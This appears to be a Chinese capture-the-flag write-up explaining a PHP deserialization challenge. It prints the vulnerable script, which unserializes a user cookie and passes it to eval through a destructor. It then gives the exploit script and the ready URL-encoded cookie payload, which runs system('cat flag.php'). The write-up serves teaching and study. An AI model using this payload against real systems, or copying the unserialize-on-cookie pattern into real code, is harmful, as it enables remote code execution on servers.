PHP反序列化-eval()

First Post:

Last Update:

Word Count:
389

Read Time:
2 min

ez_unserialize

Analyze

先上题:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php
error_reporting(0);
highlight_file(__FILE__);

class User{
    private $username='name';
    private $password='password';
    private $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            echo "successfully login";
        }
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class evil{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

先找到反序列化的地方$user = unserialize($_COOKIE['user']);,所以是对user进行cookie注入,可以使用cookie editor等插件

观察到evil类中有eval()函数,其作用是将字符串参数当做代码来执行,所以可以在这里进行攻击

User类的构造函数会生成一个新的对象,所以可以在这里改为$this->class=new evil();

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#payload
<?php
error_reporting(0);
// highlight_file(__FILE__);

class User{
    private $username='name';
    private $password='password';
    private $class;

    public function __construct(){
        $this->class=new evil();
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            echo "successfully login";
        }
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class evil{
    private $code="system('cat flag.php');";
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

$a=new User();
echo(urlencode(serialize($a)));

?>
    
#output(cookie)
user=O%3A4%3A%22User%22%3A3%3A%7Bs%3A14%3A%22%00User%00username%22%3Bs%3A4%3A%22name%22%3Bs%3A14%3A%22%00User%00password%22%3Bs%3A8%3A%22password%22%3Bs%3A11%3A%22%00User%00class%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00code%22%3Bs%3A23%3A%22system%28%27cat+flag.php%27%29%3B%22%3B%7D%7D
/?username=name&password=password

即可得到flag

reward
Alipay
Wechat